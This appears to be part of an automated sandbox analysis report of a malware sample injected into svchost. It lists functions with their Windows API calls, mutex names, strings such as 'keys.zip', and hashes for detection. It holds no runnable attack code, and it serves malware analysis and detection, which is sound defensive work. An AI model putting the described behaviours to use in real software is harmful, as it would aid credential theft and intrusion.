                                                                                                                                                                                                                • Opcode ID: 11ecd3d29679ae0524c4373278cf77c50c22b659d61fadc9aeae0bfd8b371bab
                                                                                                                                                                                                                • Instruction ID: 082aafc6b2669f92130cc55d5020ea919961aa19dd4cc1749f22b9292a4fcf94
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 11ecd3d29679ae0524c4373278cf77c50c22b659d61fadc9aeae0bfd8b371bab
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0B114F31A40305B7DB609ABA9C48F6B7F6CEFC4B91F144556BA0C97180CA70E400CAB0
                                                                                                                                                                                                                Function 02BDE214 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 200filetimeCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(000004E3,00000000,?,?,?,?), ref: 02BDE265
                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 02BDE281
                                                                                                                                                                                                                • GetFileInformationByHandle.KERNEL32(00000000,?), ref: 02BDE29B
                                                                                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 02BDE2B1
                                                                                                                                                                                                                • wsprintfA.USER32 ref: 02BDE2DC
                                                                                                                                                                                                                • realloc.MSVCRT ref: 02BDE302
                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 02BDE375
                                                                                                                                                                                                                • free.MSVCRT ref: 02BDE40A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • %02d/%02d/%04d %02d:%02d, xrefs: 02BDE2D6
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$HandleTime$ByteCharCloseCreateInformationMultiSystemWidefreereallocwsprintf
                                                                                                                                                                                                                • String ID: %02d/%02d/%04d %02d:%02d
                                                                                                                                                                                                                • API String ID: 3846129198-4051342895
                                                                                                                                                                                                                • Opcode ID: 815f13543e958ab895e0e894ef79a620a7f471f571f65d0eaebb03e296fd4bce
                                                                                                                                                                                                                • Instruction ID: 887121f4bb99086a578a7920b41cd7d38fa120a3e3618f651d0293b2a620aff9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 815f13543e958ab895e0e894ef79a620a7f471f571f65d0eaebb03e296fd4bce
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F6105719006099FCB21CF68DC44BFEBBF4EF49310F1086A9E94A9B241EB31E555CBA0
                                                                                                                                                                                                                Function 02BBB820 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81synchronizationwindowthreadCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BBB843
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02BBB870
                                                                                                                                                                                                                • IsWindow.USER32(?), ref: 02BBB877
                                                                                                                                                                                                                • SendMessageA.USER32(?,00000215,00000000,00000000), ref: 02BBB889
                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 02BBB898
                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 02BBB8A2
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BBB8B4
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02BBB8E1
                                                                                                                                                                                                                • IsWindow.USER32(?), ref: 02BBB8E8
                                                                                                                                                                                                                • SendMessageA.USER32(?,00000215,00000000,?), ref: 02BBB8FB
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window$MessageMutexObjectReleaseSendSingleThreadWait$CurrentProcess
                                                                                                                                                                                                                • String ID: P0Wu
                                                                                                                                                                                                                • API String ID: 2596333622-465009422
                                                                                                                                                                                                                • Opcode ID: 32c42720bc7eaf99465c94e3fdf705d3334006c8905539312b91ac6555d4e502
                                                                                                                                                                                                                • Instruction ID: 313fceac71f9d7898753e195fe1b4421e56a67101b079f5dc775f0d645c1fd9b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 32c42720bc7eaf99465c94e3fdf705d3334006c8905539312b91ac6555d4e502
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8D21B431A811149BC7644F69A84CEFAB7E8EF487A1B458966F705D72A1C3B09421CBA0
                                                                                                                                                                                                                Function 00401B20 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 66memorylibraryloaderCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00401150: CreateFileA.KERNEL32(G,@,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,?,?,?,00401B44,00000000,00000000), ref: 00401177
                                                                                                                                                                                                                  • Part of subcall function 00401150: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 00401193
                                                                                                                                                                                                                  • Part of subcall function 00401150: GetProcessHeap.KERNEL32(00000008,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011B3
                                                                                                                                                                                                                  • Part of subcall function 00401150: HeapAlloc.KERNEL32(00000000,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011BA
                                                                                                                                                                                                                  • Part of subcall function 00401150: memset.MSVCRT ref: 004011CD
                                                                                                                                                                                                                  • Part of subcall function 00401150: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00401B44), ref: 004011EA
                                                                                                                                                                                                                  • Part of subcall function 00401150: LockFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00401B44), ref: 004011FA
                                                                                                                                                                                                                  • Part of subcall function 00401150: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,?,00401B44), ref: 00401209
                                                                                                                                                                                                                  • Part of subcall function 00401150: UnlockFile.KERNEL32(00000000,00401B44,00000000,?,00000000,?,?,?,00401B44), ref: 0040121C
                                                                                                                                                                                                                  • Part of subcall function 00401150: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401231
                                                                                                                                                                                                                  • Part of subcall function 00401150: HeapValidate.KERNEL32(00000000), ref: 00401234
                                                                                                                                                                                                                  • Part of subcall function 00401150: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401241
                                                                                                                                                                                                                  • Part of subcall function 00401150: HeapFree.KERNEL32(00000000), ref: 00401244
                                                                                                                                                                                                                • RtlImageNtHeader.NTDLL(00000000), ref: 00401B4F
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00401B63
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 00401B74
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401B84
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401BBE
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 00401BC1
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401BCE
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00401BD1
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$File$Process$FreeValidate$AddressAllocCountCreateHandleHeaderImageLockModulePointerProcReadSizeTickUnlockmemset
                                                                                                                                                                                                                • String ID: G,@$RtlUniform$ntdll.dll
                                                                                                                                                                                                                • API String ID: 1392322707-905597979
                                                                                                                                                                                                                • Opcode ID: 2010ef54e731929bdeef478eef36219a5a0ac2089432c3df2103351bfe7421e8
                                                                                                                                                                                                                • Instruction ID: 64d0ad1f4564684b16137518c26293c6cc216b866d3c13d6df455aa1ddd35d97
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2010ef54e731929bdeef478eef36219a5a0ac2089432c3df2103351bfe7421e8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 00118271600304ABD724ABB69D49F9B7BA89F85755F044136FB09F62E1EB38DD00CA68
                                                                                                                                                                                                                Function 02BD43F0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 56sleepsynchronizationCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}), ref: 02BD440C
                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 02BD4422
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}), ref: 02BD4430
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02BD4439
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BD4451
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BD4463
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02C0D19C), ref: 02BD446E
                                                                                                                                                                                                                • Sleep.KERNEL32(00009C40,02C0D19C,VEFK), ref: 02BD4488
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Mutex$HandleOpenSleep$BackslashCloseInformationPathRelease
                                                                                                                                                                                                                • String ID: Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}$P0Wu$VEFK
                                                                                                                                                                                                                • API String ID: 849374196-2091915041
                                                                                                                                                                                                                • Opcode ID: 26f9aa116a2c6f1db9500adf69849aaa164e48377c5a0cfafa9ad00c4a2f7daa
                                                                                                                                                                                                                • Instruction ID: 6e5379fd9e14bbcd310906457cba0bb8ce58d7863ce2144634fe176fa982e413
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 26f9aa116a2c6f1db9500adf69849aaa164e48377c5a0cfafa9ad00c4a2f7daa
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3501D631AC17152AE27157A89C46F9EB398DF44B60F458694FF45A7180AFF0A8004AA5
                                                                                                                                                                                                                Function 02BD32B0 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 41sleepsynchronizationCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}), ref: 02BD32DC
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02BD32E5
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BD32F9
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BD330B
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D7752), ref: 02BD3316
                                                                                                                                                                                                                • Sleep.KERNEL32(00009C40,617D7752,RFK), ref: 02BD3330
                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 02BD3336
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                                • String ID: 617D7752$Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}$P0Wu$RFK
                                                                                                                                                                                                                • API String ID: 4280258085-3409812998
                                                                                                                                                                                                                • Opcode ID: f887a3bd9b3e2728292afedff0f7e02093899a22ed0170c183323295408a360e
                                                                                                                                                                                                                • Instruction ID: 68e7e0de324b0d8174daebddb69492ad5079e3ec8d8274e16fa552f2c5d7fa9e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f887a3bd9b3e2728292afedff0f7e02093899a22ed0170c183323295408a360e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0DF0F430AC57006BE26067549C0AF8A77DCAF44B50F808294F79AA3082ABE0A5048FB7
                                                                                                                                                                                                                Function 02BCB8F0 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 41sleepsynchronizationCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}), ref: 02BCB91C
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02BCB925
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BCB939
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BCB94B
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617d73f8), ref: 02BCB956
                                                                                                                                                                                                                • Sleep.KERNEL32(00009C40,617d73f8,ALPHA), ref: 02BCB970
                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 02BCB976
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                                • String ID: 617d73f8$ALPHA$Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}$P0Wu
                                                                                                                                                                                                                • API String ID: 4280258085-2040853542
                                                                                                                                                                                                                • Opcode ID: 8987d40ec5891cbad1fffafb5284e8260ff0b963e17ddf30d0f65c352f0f7b64
                                                                                                                                                                                                                • Instruction ID: 0c2291289010737751c32083843533006e3f3ca20c2a95795d33d8cde7308a2a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8987d40ec5891cbad1fffafb5284e8260ff0b963e17ddf30d0f65c352f0f7b64
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 71F028306C9705ABE6646B648C0BF1E77ACEF04A48F614648F742A31C0C7E0A6109BB6
                                                                                                                                                                                                                Function 02BCCB98 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 34sleepsynchronizationCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}), ref: 02BCCBAC
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02BCCBB9
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BCCBCD
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BCCBDF
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BCCBEE
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D73AC), ref: 02BCCBF5
                                                                                                                                                                                                                • Sleep.KERNEL32(00009C40,617D73AC,BSS), ref: 02BCCC0F
                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 02BCCC15
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HandleMutexSleep$BackslashCloseInformationObjectOpenPathReleaseSingleWait
                                                                                                                                                                                                                • String ID: 617D73AC$BSS$Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}$P0Wu
                                                                                                                                                                                                                • API String ID: 3206501308-1718476822
                                                                                                                                                                                                                • Opcode ID: d143cb26d3c0545a302d72525e0879a53b30abf5850e25ba685288bef5bdcf2f
                                                                                                                                                                                                                • Instruction ID: 07205b8d7a50601f808e01faa52239ce530c8c5afb569f8077eb7667d252589e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d143cb26d3c0545a302d72525e0879a53b30abf5850e25ba685288bef5bdcf2f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 55F02B30A89304BFE2716BA49D09F4E7B98AF09F45F10464DFB5AA31C1CBB084148B72
                                                                                                                                                                                                                Function 02BDA280 Relevance: 18.9, APIs: 15, Instructions: 136COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: free$malloc
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2190258309-0
                                                                                                                                                                                                                • Opcode ID: 4a15916ac8bc6abc2fe2c6db27c7bf57d77e59468c25e4416f5a0c02237f86a8
                                                                                                                                                                                                                • Instruction ID: 17ab6b3c8d91d0f1395282d63e341f22f7b90562148f0d5d61060ed70478eadd
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4a15916ac8bc6abc2fe2c6db27c7bf57d77e59468c25e4416f5a0c02237f86a8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C84131B1D416118BC721DFD8E8C0B9AB7A5EB44B14F1B4EB9E44A47608E731A860CFD2
                                                                                                                                                                                                                Function 02BC1BD0 Relevance: 17.9, APIs: 14, Instructions: 355COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: c35d695e3bd8e19de5a0471123e2fc32ff4311193cf77c9fc93b21f1187ca94c
                                                                                                                                                                                                                • Instruction ID: 14a43275888d6cb6a7b5411c98b97984546beb866c874734d84ecda34e4a60e3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c35d695e3bd8e19de5a0471123e2fc32ff4311193cf77c9fc93b21f1187ca94c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 94C1D471A106169FCB14CF2CC8A4BAB7BB5EF49344B2482C8ED59EB341D731EA05CB90
                                                                                                                                                                                                                Function 02BD5BB0 Relevance: 17.6, APIs: 14, Instructions: 147COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2221118986-0
                                                                                                                                                                                                                • Opcode ID: ebdefe0ccf7dca4d477b1ac3c68d8fca596ad1d5551be48629f1ca220201ef3e
                                                                                                                                                                                                                • Instruction ID: 899c3b54fc84715de8db1ab819a65c2972a449072b2a6a59033f0abab28b18a8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ebdefe0ccf7dca4d477b1ac3c68d8fca596ad1d5551be48629f1ca220201ef3e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F3513FB1D412159ADB50DF94C884AEB7BB9AF08340F0441BAEE0CAF285D7745645CFE1
                                                                                                                                                                                                                Function 02BD3B40 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 138COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02C0D098), ref: 02BD3B70
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD3BB1
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BD3BBB
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BD3BC3
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD3BD4
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02BD3BDB
                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(?), ref: 02BD3BE8
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02C0D098,?,02BD3D9C), ref: 02BD3C57
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Path$BackslashDirectoryErrorLast$AdminCreateCurrentFolderMakeSystemUser
                                                                                                                                                                                                                • String ID: keys.zip$path1.txt
                                                                                                                                                                                                                • API String ID: 1373881290-1274251082
                                                                                                                                                                                                                • Opcode ID: 458abd76119522f9249da9a04a44250f75919daf90a7f6d978517eda264d8423
                                                                                                                                                                                                                • Instruction ID: b130c36ab5bc641ae5260634855e32cce1384bdbf5e97494b5fa8f7c66111347
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 458abd76119522f9249da9a04a44250f75919daf90a7f6d978517eda264d8423
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 74410B715047454BCB258F3898A4BEABBE5FF56340F0489D4EACAD7301EB71D984CB91
                                                                                                                                                                                                                Function 02BBC310 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120synchronizationCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • WindowFromDC.USER32(?), ref: 02BBC31C
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BBC354
                                                                                                                                                                                                                • CreateRectRgn.GDI32(00000001,00000001,00000001,00000001), ref: 02BBC362
                                                                                                                                                                                                                • GetClipRgn.GDI32(?,00000000), ref: 02BBC36C
                                                                                                                                                                                                                • SelectClipRgn.GDI32(00000000,00000000), ref: 02BBC37C
                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 02BBC383
                                                                                                                                                                                                                • GetViewportOrgEx.GDI32(?,?), ref: 02BBC38E
                                                                                                                                                                                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 02BBC3A2
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02BBC3E3
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ClipObjectViewport$CreateDeleteFromMutexRectReleaseSelectSingleWaitWindow
                                                                                                                                                                                                                • String ID: P0Wu
                                                                                                                                                                                                                • API String ID: 3315380975-465009422
                                                                                                                                                                                                                • Opcode ID: e08055e1d9b8f15b94b1078f0f9eabf9d581e1c3c6ff677bd255dd42d2406790
                                                                                                                                                                                                                • Instruction ID: 4beef16bbd8e3095bc5a758c7a560748fc3b2c91fc9631c2ab5733f262eff743
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e08055e1d9b8f15b94b1078f0f9eabf9d581e1c3c6ff677bd255dd42d2406790
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FF41FCB6641105AFCB64CF69DC84EAB77BDEF8C751B508609FA19D3240D670E850CBA0
